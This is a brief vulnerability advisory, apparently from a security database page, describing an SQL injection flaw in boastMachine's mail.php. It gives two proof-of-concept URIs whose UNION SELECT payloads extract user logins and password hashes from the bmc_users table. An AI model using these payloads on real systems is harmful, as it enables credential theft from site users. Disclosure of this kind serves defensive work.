|
boastMachine 'mail.php' SQL Injection Vulnerability
An attacker can exploit this issue via a browser. The following proof-of-concept URIs are available: http://www.example.com/bm/mail.php?id='/**/union/**/select/**/1,2,concat(user_login,char(58),user_pass),4/**/from/**/bmc_users/**/where/**/id=1/*&blog=1 http://mail.php?action=R3d.W0rm&blog=1&id=-99999'+union+select+0,1,concat_ws(0x7c,user_login,user_pass),3+from+bmc_users/* |
|
|
Privacy Statement |